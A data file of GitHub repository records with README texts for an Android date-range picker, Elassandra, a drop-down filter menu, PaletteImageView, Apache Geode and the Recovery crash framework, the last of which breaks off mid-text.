'com.borax12.materialdaterangepicker:library:2.0' -} - -``` -Beginning Version 2.0 now also available on Maven Central - - -## Date Selection - -![FROM](/screenshots/2.png?raw=true) -![TO](/screenshots/1.png?raw=true) - -## Time Selection - -![FROM](/screenshots/3.png?raw=true) -![TO](/screenshots/4.png?raw=true) - 
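The `onTimeSet` callback shown in the usage section below builds a display string by zero-padding hours and minutes; that logic can be exercised as plain Java, independent of Android (the class name `RangeFormatter` is ours, for illustration):

```java
// Plain-Java sketch of the zero-padding used when a picked time range is
// rendered as "From - HHhMM To - HHhMM" (no Android classes required).
public class RangeFormatter {
    static String pad(int value) {
        return value < 10 ? "0" + value : "" + value;
    }

    static String format(int fromHour, int fromMinute, int toHour, int toMinute) {
        return "From - " + pad(fromHour) + "h" + pad(fromMinute)
                + " To - " + pad(toHour) + "h" + pad(toMinute);
    }

    public static void main(String[] args) {
        System.out.println(format(9, 5, 17, 30)); // From - 09h05 To - 17h30
    }
}
```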
-Support for Android 4.0 and up.
-
-From the original library documentation -
-
-You may also add the library as an Android Library to your project. All the library files live in ```library```.
-
-Using the Pickers
---------------------------------
-
-1. Implement an `OnDateSetListener` or `OnTimeSetListener`
-2. Create a `DatePickerDialog` using the supplied factory
-
-### Implement an `OnDateSetListener`
-In order to receive the date set in the picker, you will need to implement the `OnDateSetListener` interface. Typically this will be the `Activity` or `Fragment` that creates the Pickers.
-
-or
-### Implement an `OnTimeSetListener`
-In order to receive the time set in the picker, you will need to implement the `OnTimeSetListener` interface. Typically this will be the `Activity` or `Fragment` that creates the Pickers.
-
-```java
-
-//new onDateSet
-@Override
-public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth, int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) {
-
-}
-
-@Override
-public void onTimeSet(TimePickerDialog view, int hourOfDay, int minute, int hourOfDayEnd, int minuteEnd) {
-    String hourString = hourOfDay < 10 ? ""0""+hourOfDay : """"+hourOfDay;
-    String minuteString = minute < 10 ? ""0""+minute : """"+minute;
-    String hourStringEnd = hourOfDayEnd < 10 ? ""0""+hourOfDayEnd : """"+hourOfDayEnd;
-    String minuteStringEnd = minuteEnd < 10 ? ""0""+minuteEnd : """"+minuteEnd;
-    String time = ""You picked the following time: From - ""+hourString+""h""+minuteString+"" To - ""+hourStringEnd+""h""+minuteStringEnd;
-
-    timeTextView.setText(time);
-
-}
-```
-
-### Create a `DatePickerDialog` using the supplied factory
-You will need to create a new instance of `DatePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.
- -```java -Calendar now = Calendar.getInstance(); -DatePickerDialog dpd = DatePickerDialog.newInstance( - MainActivity.this, - now.get(Calendar.YEAR), - now.get(Calendar.MONTH), - now.get(Calendar.DAY_OF_MONTH) -); -dpd.show(getFragmentManager(), ""Datepickerdialog""); -``` - -### Create a TimePickerDialog` using the supplied factory -You will need to create a new instance of `TimePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`. -```java -Calendar now = Calendar.getInstance(); -TimePickerDialog tpd = TimePickerDialog.newInstance( - MainActivity.this, - now.get(Calendar.HOUR_OF_DAY), - now.get(Calendar.MINUTE), - false - ); -tpd.show(getFragmentManager(), ""Timepickerdialog""); -``` - -For other documentation regarding theming , handling orientation changes , and callbacks - check out the original documentation - https://github.com/wdullaer/MaterialDateTimePicker",0 -strapdata/elassandra,Elassandra = Elasticsearch + Apache Cassandra,2015-08-22T13:52:08Z,,"# Elassandra [![Build Status](https://travis-ci.org/strapdata/elassandra.svg)](https://travis-ci.org/strapdata/elassandra) [![Documentation Status](https://readthedocs.org/projects/elassandra/badge/?version=latest)](https://elassandra.readthedocs.io/en/latest/?badge=latest) [![GitHub release](https://img.shields.io/github/v/release/strapdata/elassandra.svg)](https://github.com/strapdata/elassandra/releases/latest) -[![Twitter](https://img.shields.io/twitter/follow/strapdataio?style=social)](https://twitter.com/strapdataio) - -![Elassandra Logo](elassandra-logo.png) - -## [http://www.elassandra.io/](http://www.elassandra.io/) - -Elassandra is an [Apache Cassandra](http://cassandra.apache.org) distribution including an [Elasticsearch](https://github.com/elastic/elasticsearch) search engine. 
-Elassandra is a multi-master multi-cloud database and search engine with support for replicating across multiple datacenters in active/active mode.
-
-Elasticsearch code is embedded in Cassandra nodes, providing advanced search features on Cassandra tables, while Cassandra serves as the Elasticsearch data and configuration store.
-
-![Elassandra architecture](/docs/elassandra/source/images/elassandra1.jpg)
-
-Elassandra supports Cassandra vnodes and scales horizontally by adding more nodes without the need to reshard indices.
-
-Project documentation is available at [doc.elassandra.io](http://doc.elassandra.io).
-
-## Benefits of Elassandra
-
-For Cassandra users, Elassandra provides Elasticsearch features:
-* Cassandra updates are indexed in Elasticsearch.
-* Full-text and spatial search on your Cassandra data.
-* Real-time aggregation (does not require Spark or Hadoop to GROUP BY).
-* Search across multiple keyspaces and tables in one query.
-* Automatic schema creation, with support for nested documents using [User Defined Types](https://docs.datastax.com/en/cql/3.1/cql/cql_using/cqlUseUDT.html).
-* Read/write JSON REST access to Cassandra data.
-* Numerous Elasticsearch plugins and products like [Kibana](https://www.elastic.co/guide/en/kibana/current/introduction.html).
-* Manages concurrent Elasticsearch mapping changes and applies batched, atomic CQL schema changes.
-* Supports [Elasticsearch ingest processors](https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html), allowing input data to be transformed.
-
-For Elasticsearch users, Elassandra provides useful features:
-* Elassandra is masterless. Cluster state is managed through [cassandra lightweight transactions](http://www.datastax.com/dev/blog/lightweight-transactions-in-cassandra-2-0).
-* Elassandra is a sharded multi-master database, where Elasticsearch is sharded master-slave. Thus, Elassandra has no Single Point Of Write, helping to achieve high availability.
-* Elassandra inherits Cassandra data repair mechanisms (hinted handoff, read repair and nodetool repair) providing support for **cross datacenter replication**.
-* When adding a node to an Elassandra cluster, only data pulled from existing nodes is re-indexed in Elasticsearch.
-* Cassandra can be your single datastore for indexed and non-indexed data, making it easier to manage and secure. Source documents are stored in Cassandra, reducing disk usage if you need both a NoSQL database and Elasticsearch.
-* Write operations are not restricted to one primary shard, but distributed across all Cassandra nodes in a virtual datacenter. The number of shards does not limit your write throughput. Adding Elassandra nodes increases both read and write throughput.
-* Elasticsearch indices can be replicated among many Cassandra datacenters, allowing you to write to the closest datacenter and search globally.
-* The [cassandra driver](http://www.planetcassandra.org/client-drivers-tools/) is Datacenter and Token aware, providing automatic load-balancing and failover.
-* Elassandra efficiently stores Elasticsearch documents in binary SSTables without any JSON overhead.
-
-## Quick start
-
-* [Quick Start](http://doc.elassandra.io/en/latest/quickstart.html) guide to run a single node Elassandra cluster in docker.
-* [Deploy Elassandra by launching a Google Kubernetes Engine](./docs/google-kubernetes-tutorial.md):
-
- [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/strapdata/elassandra-google-k8s-marketplace&tutorial=docs/google-kubernetes-tutorial.md)
-
-## Upgrade Instructions
-
-
-#### Elassandra 6.8.4.2+
-
-Since version 6.8.4.2, the gossip X1 application state can be compressed using a system property. Enabling this setting allows the creation of a large number of virtual indices.
-Before enabling this setting, upgrade all the 6.8.4.x nodes to 6.8.4.2 (or higher). Once all the nodes are running 6.8.4.2, they can decompress the application state even if the setting isn't yet configured locally.
-
-#### Elassandra 6.2.3.25+
-
-Elassandra uses the Cassandra GOSSIP protocol to manage the Elasticsearch routing table, and Elassandra 6.8.4.2+ adds support for compression of
-the X1 application state to increase the maximum number of Elasticsearch indices. For backward compatibility, compression is disabled by default,
-but once all your nodes are upgraded to version 6.8.4.2+, you should enable X1 compression by adding **-Des.compress_x1=true** to your **conf/jvm.options** and performing a rolling restart of all nodes.
-Nodes running version 6.8.4.2+ can read both compressed and uncompressed X1.
-
-#### Elassandra 6.2.3.21+
-
-Before version 6.2.3.21, the Cassandra replication factor for the **elastic_admin** keyspace (and elastic_admin_[datacenter.group]) was automatically adjusted to the
-number of nodes in the datacenter. Since version 6.2.3.21, because this had a performance impact on large clusters, it is up to your Elassandra administrator to
-properly adjust the replication factor for this keyspace. Keep in mind that Elasticsearch mapping updates rely on a PAXOS transaction that requires QUORUM nodes to succeed,
-so the replication factor should be at least 3 in each datacenter.
-
-#### Elassandra 6.2.3.19+
-
-Elassandra 6.2.3.19 metadata version now relies on the Cassandra table **elastic_admin.metadata_log** (which was **elastic_admin.metadata** from 6.2.3.8 to 6.2.3.18)
-to keep the elasticsearch mapping update history and automatically recover from a possible PAXOS write timeout issue.
-
-When upgrading the first node of a cluster, Elassandra automatically copies the current **metadata.version** into the new **elastic_admin.metadata_log** table.
-To avoid Elasticsearch mapping inconsistency, avoid mapping updates while the rolling upgrade is in progress. Once all nodes are upgraded,
-the **elastic_admin.metadata** table is no longer used and can be removed. You can then get the mapping update history from the new **elastic_admin.metadata_log** and see
-which node updated the mapping, when, and for what reason.
-
-#### Elassandra 6.2.3.8+
-
-Elassandra 6.2.3.8+ now fully manages the elasticsearch mapping in the CQL schema through the use of CQL schema extensions (see *system_schema.tables*, column *extensions*). These table extensions and the CQL schema updates resulting from elasticsearch index creation/modification are applied in batched atomic schema updates to ensure consistency when concurrent updates occur. Moreover, these extensions are stored in binary form and support partial updates for efficiency. As a result, the elasticsearch mapping is no longer stored in the *elastic_admin.metadata* table.
-
-WARNING: During the rolling upgrade, elasticsearch mapping changes are not propagated between nodes running the new and the old versions, so don't change your mapping while you're upgrading. Once all your nodes have been upgraded to 6.2.3.8+ and validated, apply the following CQL statements to remove the now-unused elasticsearch metadata:
-```bash
-ALTER TABLE elastic_admin.metadata DROP metadata;
-ALTER TABLE elastic_admin.metadata WITH comment = '';
-```
-
-WARNING: Due to the CQL table extensions used by Elassandra, some old versions of **cqlsh** may fail with the error message **""'module' object has no attribute 'viewkeys'.""**. This comes from the old python cassandra driver embedded in Cassandra and has been reported in [CASSANDRA-14942](https://issues.apache.org/jira/browse/CASSANDRA-14942). 
Possible workarounds: -* Use the **cqlsh** embedded with Elassandra -* Install a recent version of the **cqlsh** utility (*pip install cqlsh*) or run it from a docker image: - -```bash -docker run -it --rm strapdata/cqlsh:0.1 node.example.com -``` - -#### Elassandra 6.x changes - -* Elasticsearch now supports only one document type per index backed by one Cassandra table. Unless you specify an elasticsearch type name in your mapping, data is stored in a cassandra table named **""_doc""**. If you want to search many cassandra tables, you now need to create and search many indices. -* Elasticsearch 6.x manages shard consistency through several metadata fields (_primary_term, _seq_no, _version) that are not used in elassandra because replication is fully managed by cassandra. - -## Installation - -Ensure Java 8 is installed and `JAVA_HOME` points to the correct location. - -* [Download](https://github.com/strapdata/elassandra/releases) and extract the distribution tarball -* Define the CASSANDRA_HOME environment variable : `export CASSANDRA_HOME=` -* Run `bin/cassandra -e` -* Run `bin/nodetool status` -* Run `curl -XGET localhost:9200/_cluster/state` - -#### Example - -Try indexing a document on a non-existing index: - -```bash -curl -XPUT 'http://localhost:9200/twitter/_doc/1?pretty' -H 'Content-Type: application/json' -d '{ - ""user"": ""Poulpy"", - ""post_date"": ""2017-10-04T13:12:00Z"", - ""message"": ""Elassandra adds dynamic mapping to Cassandra"" -}' -``` - -Then look-up in Cassandra: - -```bash -bin/cqlsh -e ""SELECT * from twitter.\""_doc\"""" -``` - -Behind the scenes, Elassandra has created a new Keyspace `twitter` and table `_doc`. 
- -```CQL -admin@cqlsh>DESC KEYSPACE twitter; - -CREATE KEYSPACE twitter WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true; - -CREATE TABLE twitter.""_doc"" ( - ""_id"" text PRIMARY KEY, - message list, - post_date list, - user list -) WITH bloom_filter_fp_chance = 0.01 - AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'} - AND comment = '' - AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'} - AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'} - AND crc_check_chance = 1.0 - AND dclocal_read_repair_chance = 0.1 - AND default_time_to_live = 0 - AND gc_grace_seconds = 864000 - AND max_index_interval = 2048 - AND memtable_flush_period_in_ms = 0 - AND min_index_interval = 128 - AND read_repair_chance = 0.0 - AND speculative_retry = '99PERCENTILE'; -CREATE CUSTOM INDEX elastic__doc_idx ON twitter.""_doc"" () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex'; -``` - -By default, multi valued Elasticsearch fields are mapped to Cassandra list. 
-Now, insert a row with CQL : - -```CQL -INSERT INTO twitter.""_doc"" (""_id"", user, post_date, message) -VALUES ( '2', ['Jimmy'], [dateof(now())], ['New data is indexed automatically']); -SELECT * FROM twitter.""_doc""; - - _id | message | post_date | user ------+--------------------------------------------------+-------------------------------------+------------ - 2 | ['New data is indexed automatically'] | ['2019-07-04 06:00:21.893000+0000'] | ['Jimmy'] - 1 | ['Elassandra adds dynamic mapping to Cassandra'] | ['2017-10-04 13:12:00.000000+0000'] | ['Poulpy'] - -(2 rows) -``` - -Then search for it with the Elasticsearch API: - -```bash -curl ""localhost:9200/twitter/_search?q=user:Jimmy&pretty"" -``` - -And here is a sample response : - -```JSON -{ - ""took"" : 3, - ""timed_out"" : false, - ""_shards"" : { - ""total"" : 1, - ""successful"" : 1, - ""skipped"" : 0, - ""failed"" : 0 - }, - ""hits"" : { - ""total"" : 1, - ""max_score"" : 0.6931472, - ""hits"" : [ - { - ""_index"" : ""twitter"", - ""_type"" : ""_doc"", - ""_id"" : ""2"", - ""_score"" : 0.6931472, - ""_source"" : { - ""post_date"" : ""2019-07-04T06:00:21.893Z"", - ""message"" : ""New data is indexed automatically"", - ""user"" : ""Jimmy"" - } - } - ] - } -} -``` - -## Support - - * Commercial support is available through [Strapdata](http://www.strapdata.com/). - * Community support available via [elassandra google groups](https://groups.google.com/forum/#!forum/elassandra). - * Post feature requests and bugs on https://github.com/strapdata/elassandra/issues - -## License - -``` -This software is licensed under the Apache License, version 2 (""ALv2""), quoted below. - -Copyright 2015-2018, Strapdata (contact@strapdata.com). - -Licensed under the Apache License, Version 2.0 (the ""License""); you may not -use this file except in compliance with the License. 
You may obtain a copy of
-the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
-Unless required by applicable law or agreed to in writing, software
-distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT
-WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
-License for the specific language governing permissions and limitations under
-the License.
-```
-
-## Acknowledgments
-
-* Elasticsearch, Logstash, Beats and Kibana are trademarks of Elasticsearch BV, registered in the U.S. and in other countries.
-* Apache Cassandra, Apache Lucene, Apache, Lucene and Cassandra are trademarks of the Apache Software Foundation.
-* Elassandra is a trademark of Strapdata SAS.
-",0
-dongjunkun/DropDownMenu,A practical multi-condition filter menu,2015-06-23T07:43:56Z,,"[![](https://jitpack.io/v/dongjunkun/DropDownMenu.svg)](https://jitpack.io/#dongjunkun/DropDownMenu)
-
-## Introduction
-A practical multi-condition filter menu. You can see this effect in many apps, such as Meituan and iQIYI movie tickets.
-
-My blog post: [Building my own widget -- how to implement the common Android multi-condition filter menu (similar to the drop-down menus of Meituan and iQIYI movie tickets)](http://www.jianshu.com/p/d9407f799d2d)
-
-## Features
- - Supports multi-level menus
- - You can fully customize your menu style; this library only wraps some practical methods, the tab switching effect, the menu show/hide animations, and so on
- - Not implemented with popupWindow, so there is no lag
-
-## ScreenShot
-
-
-Download APK
-
-Or scan the QR code
-
-
-
-## Gradle Dependency
-
-```
-allprojects {
- repositories {
- ...
- maven { url ""https://jitpack.io"" }
- }
-}
-
-dependencies {
- compile 'com.github.dongjunkun:DropDownMenu:1.0.4'
-}
-```
-
-## Usage
-Add DropDownMenu to your layout file, as follows
-```
-
-```
-Then just call the following code in your java code
-
-```
- //tabs: all tab titles, popupViews: all menus, contentView: the content view
-mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView);
-```
-If you want to learn more, read the source of the Example
-
-> It is recommended to copy the code into your project: just copy DropDownMenu.java and all the files under res
-
-## About me
-Jianshu: [dongjunkun](http://www.jianshu.com/users/f07458c1a8f3/latest_articles)
-",0
-DingMouRen/PaletteImageView,"An ImageView that understands smart color matching, and can also give itself colorful shadows. (Understand the intelligent color matching ImageView, but also to set their own colorful shadow Oh!)",2017-04-25T12:05:08Z,,"![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p1.png) 
-
-### English Readme
-[English Version](https://github.com/hasanmohdkhan/PaletteImageView/blob/master/README%20English.md)
-(Thank you, [hasanmohdkhan](https://github.com/hasanmohdkhan))
-
-### Introduction
-* Can extract the dominant color of an image; **by default the dominant color is used as the color of the view's shadow**
-* Lets you **set a custom shadow color for the view**
-* Lets you **control the corner radius of each of the view's four corners** (if the view is square, it becomes a circle as the corner radius grows)
-* Lets you **control the radius of the view's shadow**
-* Lets you **control the shadow's offset in the x and y directions separately**
-* Can extract **six theme colors** from an image; each theme color comes with **recommended matching colors for background, title and body text**
-
-
-### Reference in build.gradle
-```
- compile 'com.dingmouren.paletteimageview:paletteimageview:1.0.7'
-```
-                 ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/title.gif)
-##### 1. Parameter control
-Corner radius|Shadow blur range|Shadow offset
----|---|---
-![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo1.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo2.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo3.gif)
-
-##### 2. The shadow color defaults to the image's dominant color
-
-                   ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo4.gif)
-![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p2.png)
-##### 3. Image color theme extraction 
-![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p3.png)
-### Usage
-
-```
-
- mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() {
- @Override //finished parsing the image's colors
- public void onComplete(PaletteImageView paletteImageView) {
- int[] vibrant = paletteImageView.getVibrantColor();
- int[] vibrantDark = paletteImageView.getDarkVibrantColor();
- int[] vibrantLight = paletteImageView.getLightVibrantColor();
- int[] muted = paletteImageView.getMutedColor();
- int[] mutedDark = paletteImageView.getDarkMutedColor();
- int[] mutedLight = paletteImageView.getLightMutedColor();
- }
-
- @Override //failed to parse the image's colors
- public void onFail() {
-
- }
- });
-```
-### xml attributes
-
-xml attribute | Description
----|---
- app:palettePadding | **The maximum space reserved for the shadow. With a value of 0 there is no shadow; the shadow appears only for values greater than 0.**
- app:paletteOffsetX | The shadow's offset in the x direction
- app:paletteOffsetY | The shadow's offset in the y direction
- app:paletteSrc | The image resource
- app:paletteRadius | The corner radius
- app:paletteShadowRadius | The shadow blur range
-### Public methods
-Method | Description
----|---
-public void setShadowColor(int color) | Sets a custom shadow color for the view
- public void setBitmap(Bitmap bitmap) | Sets the view's bitmap
- public void setPaletteRadius(int radius) | Sets the view's corner radius
- public void setPaletteShadowOffset(int offsetX, int offsetY) | Sets the shadow's offset in the x and y directions
- public void setPaletteShadowRadius(int radius) | Sets the shadow blur range
- public void setOnParseColorListener(OnParseColorListener listener) | Sets the listener for parsing the image's colors
- public int[] getVibrantColor() | Returns the color array of the Vibrant theme; given the array arry, arry[0] is the recommended title color, arry[1] the recommended body text color, arry[2] the recommended background color. These colors are only recommendations; you can choose your own
- public int[] getDarkVibrantColor()| Returns the color array of the DarkVibrant theme; the array elements have the same meaning as above
- public int[] getLightVibrantColor()| Returns the color array of the LightVibrant theme; the array elements have the same meaning as above
- public int[] getMutedColor()| Returns the color array of the Muted theme; the array elements have the same meaning as above
- public int[] getDarkMutedColor()| Returns the color array of the DarkMuted theme; the array elements have the same meaning as above
- public int[] getLightMutedColor()| Returns the color array of the LightMuted theme; the array elements have the same meaning as above
-
-This project is no longer maintained
- - -",0 -apache/geode,Apache Geode,2015-04-30T07:00:05Z,,"
- -[![Apache Geode logo](https://geode.apache.org/img/Apache_Geode_logo.png)](http://geode.apache.org) - -[![Build Status](https://concourse.apachegeode-ci.info/api/v1/teams/main/pipelines/apache-develop-main/badge)](https://concourse.apachegeode-ci.info/teams/main/pipelines/apache-develop-main) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.apache.geode/geode-core/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22) [![homebrew](https://img.shields.io/homebrew/v/apache-geode.svg)](https://formulae.brew.sh/formula/apache-geode) [![Docker Pulls](https://img.shields.io/docker/pulls/apachegeode/geode.svg)](https://hub.docker.com/r/apachegeode/geode/) [![Total alerts](https://img.shields.io/lgtm/alerts/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/alerts/) [![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:java) [![Language grade: JavaScript](https://img.shields.io/lgtm/grade/javascript/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:javascript) [![Language grade: Python](https://img.shields.io/lgtm/grade/python/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:python) - -
- -## Contents - -1. [Overview](#overview) -2. [How to Get Apache Geode](#obtaining) -3. [Main Concepts and Components](#concepts) -4. [Location of Directions for Building from Source](#building) -5. [Geode in 5 minutes](#started) -6. [Application Development](#development) -7. [Documentation](https://geode.apache.org/docs/) -8. [Wiki](https://cwiki.apache.org/confluence/display/GEODE/Index) -9. [How to Contribute](https://cwiki.apache.org/confluence/display/GEODE/How+to+Contribute) -10. [Export Control](#export) - -## Overview - -[Apache Geode](http://geode.apache.org/) is -a data management platform that provides real-time, consistent access to -data-intensive applications throughout widely distributed cloud architectures. - -Apache Geode pools memory, CPU, network resources, and optionally local disk -across multiple processes to manage application objects and behavior. It uses -dynamic replication and data partitioning techniques to implement high -availability, improved performance, scalability, and fault tolerance. In -addition to being a distributed data container, Apache Geode is an in-memory -data management system that provides reliable asynchronous event notifications -and guaranteed message delivery. - -Apache Geode is a mature, robust technology originally developed by GemStone -Systems. Commercially available as GemFire™, it was first deployed in the -financial sector as the transactional, low-latency data engine used in Wall -Street trading platforms. Today Apache Geode technology is used by hundreds of -enterprise customers for high-scale business applications that must meet low -latency and 24x7 availability requirements. - -## How to Get Apache Geode - -You can download Apache Geode from the -[website](https://geode.apache.org/releases/), run a Docker -[image](https://hub.docker.com/r/apachegeode/geode/), or install with -[Homebrew](https://formulae.brew.sh/formula/apache-geode) on OSX. 
Application developers -can load dependencies from [Maven -Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22). - -Maven -```xml - - - org.apache.geode - geode-core - $VERSION - - -``` - -Gradle -```groovy -dependencies { - compile ""org.apache.geode:geode-core:$VERSION"" -} -``` - -## Main Concepts and Components - -_Caches_ are an abstraction that describe a node in an Apache Geode distributed -system. - -Within each cache, you define data _regions_. Data regions are analogous to -tables in a relational database and manage data in a distributed fashion as -name/value pairs. A _replicated_ region stores identical copies of the data on -each cache member of a distributed system. A _partitioned_ region spreads the -data among cache members. After the system is configured, client applications -can access the distributed data in regions without knowledge of the underlying -system architecture. You can define listeners to receive notifications when -data has changed, and you can define expiration criteria to delete obsolete -data in a region. - -_Locators_ provide clients with both discovery and server load balancing -services. Clients are configured with locator information, and the locators -maintain a dynamic list of member servers. The locators provide clients with -connection information to a server. - -Apache Geode includes the following features: - -* Combines redundancy, replication, and a ""shared nothing"" persistence - architecture to deliver fail-safe reliability and performance. -* Horizontally scalable to thousands of cache members, with multiple cache - topologies to meet different enterprise needs. The cache can be - distributed across multiple computers. -* Asynchronous and synchronous cache update propagation. -* Delta propagation distributes only the difference between old and new - versions of an object (delta) instead of the entire object, resulting in - significant distribution cost savings. 
-* Reliable asynchronous event notifications and guaranteed message delivery - through optimized, low latency distribution layer. -* Data awareness and real-time business intelligence. If data changes as - you retrieve it, you see the changes immediately. -* Integration with Spring Framework to speed and simplify the development - of scalable, transactional enterprise applications. -* JTA compliant transaction support. -* Cluster-wide configurations that can be persisted and exported to other - clusters. -* Remote cluster management through HTTP. -* REST APIs for REST-enabled application development. -* Rolling upgrades may be possible, but they will be subject to any - limitations imposed by new features. - -## Building this Release from Source - -See [BUILDING.md](./BUILDING.md) for -instructions on how to build the project. - -## Running Tests -See [TESTING.md](./TESTING.md) for -instructions on how to run tests. - -## Geode in 5 minutes - -Geode requires installation of JDK version 1.8. 
After installing Apache Geode, -start a locator and server: -```console -$ gfsh -gfsh> start locator -gfsh> start server -``` - -Create a region: -```console -gfsh> create region --name=hello --type=REPLICATE -``` - -Write a client application (this example uses a [Gradle](https://gradle.org) -build script): - -_build.gradle_ -```groovy -apply plugin: 'java' -apply plugin: 'application' - -mainClassName = 'HelloWorld' - -repositories { mavenCentral() } -dependencies { - compile 'org.apache.geode:geode-core:1.4.0' - runtime 'org.slf4j:slf4j-log4j12:1.7.24' -} -``` - -_src/main/java/HelloWorld.java_ -```java -import java.util.Map; -import org.apache.geode.cache.Region; -import org.apache.geode.cache.client.*; - -public class HelloWorld { - public static void main(String[] args) throws Exception { - ClientCache cache = new ClientCacheFactory() - .addPoolLocator(""localhost"", 10334) - .create(); - Region region = cache - .createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY) - .create(""hello""); - - region.put(""1"", ""Hello""); - region.put(""2"", ""World""); - - for (Map.Entry entry : region.entrySet()) { - System.out.format(""key = %s, value = %s\n"", entry.getKey(), entry.getValue()); - } - cache.close(); - } -} -``` - -Build and run the `HelloWorld` example: -```console -$ gradle run -``` - -The application will connect to the running cluster, create a local cache, put -some data in the cache, and print the cached data to the console: -```console -key = 1, value = Hello -key = 2, value = World -``` - -Finally, shutdown the Geode server and locator: -```console -gfsh> shutdown --include-locators=true -``` - -For more information see the [Geode -Examples](https://github.com/apache/geode-examples) repository or the -[documentation](https://geode.apache.org/docs/). 
- -## Application Development - -Apache Geode applications can be written in these client technologies: - -* Java [client](https://geode.apache.org/docs/guide/18/topologies_and_comm/cs_configuration/chapter_overview.html) - or [peer](https://geode.apache.org/docs/guide/18/topologies_and_comm/p2p_configuration/chapter_overview.html) -* [REST](https://geode.apache.org/docs/guide/18/rest_apps/chapter_overview.html) -* [Memcached](https://cwiki.apache.org/confluence/display/GEODE/Moving+from+memcached+to+gemcached) - -The following libraries are available external to the Apache Geode project: - -* [Spring Data GemFire](https://projects.spring.io/spring-data-gemfire/) -* [Spring Cache](https://docs.spring.io/spring/docs/current/spring-framework-reference/html/cache.html) -* [Python](https://github.com/gemfire/py-gemfire-rest) - -## Export Control - -This distribution includes cryptographic software. -The country in which you currently reside may have restrictions -on the import, possession, use, and/or re-export to another country, -of encryption software. BEFORE using any encryption software, -please check your country's laws, regulations and policies -concerning the import, possession, or use, and re-export of -encryption software, to see if this is permitted. -See for more information. - -The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS), -has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1, -which includes information security software using or performing -cryptographic functions with asymmetric algorithms. -The form and manner of this Apache Software Foundation distribution makes -it eligible for export under the License Exception -ENC Technology Software Unrestricted (TSU) exception -(see the BIS Export Administration Regulations, Section 740.13) -for both object code and source code. 
-
-The following provides more details on the included cryptographic software:
-
-* Apache Geode is designed to be used with
- [Java Secure Socket Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/jsse/JSSERefGuide.html) (JSSE) and
- [Java Cryptography Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html) (JCE).
- The [JCE Unlimited Strength Jurisdiction Policy](https://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html)
- may need to be installed separately to use keystore passwords with 7 or more characters.
-* Apache Geode links to and uses [OpenSSL](https://www.openssl.org/) ciphers.
-
-",0
-Sunzxyong/Recovery,a crash recovery framework.(一个App异常恢复框架),2016-09-04T08:13:19Z,,"# **Recovery**
-A crash recovery framework!
-
-----
-
-[ ![Download](https://api.bintray.com/packages/sunzxyong/maven/Recovery/images/download.svg) ](https://bintray.com/sunzxyong/maven/Recovery/_latestVersion) ![build](https://img.shields.io/badge/build-passing-blue.svg) [![License](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/Sunzxyong/Recovery/blob/master/LICENSE)
-
-[中文文档](https://github.com/Sunzxyong/Recovery/blob/master/README-Chinese.md)
-
-# **Introduction**
-
-[Blog entry with introduction](http://zhengxiaoyong.com/2016/09/05/Android%E8%BF%90%E8%A1%8C%E6%97%B6Crash%E8%87%AA%E5%8A%A8%E6%81%A2%E5%A4%8D%E6%A1%86%E6%9E%B6-Recovery)
-
-“Recovery” can help you automatically handle application crashes at runtime. It provides you with the following functionality:
-
-* Automatic recovery of the activity, with its stack and data;
-* Ability to recover to the top activity;
-* A way to view and save crash info;
-* Ability to restart and clear the cache;
-* A restart instead of a recovery if recovery failed twice in one minute. 
-
-# **Art**
-![recovery](http://7xswxf.com2.z0.glb.qiniucdn.com//blog/recovery.jpg)
-
-# **Usage**
-## **Installation**
-**Using Gradle**
-
-```gradle
- implementation 'com.zxy.android:recovery:1.0.0'
-```
-
-or
-
-```gradle
- debugImplementation 'com.zxy.android:recovery:1.0.0'
- releaseImplementation 'com.zxy.android:recovery-no-op:1.0.0'
-```
-
-
-**Using Maven**
-
-```xml
-
- com.zxy.android
- recovery
- 1.0.0
- pom
-
-```
-
-## **Initialization**
-You can use this code sample to initialize Recovery in your application:
-
-```java
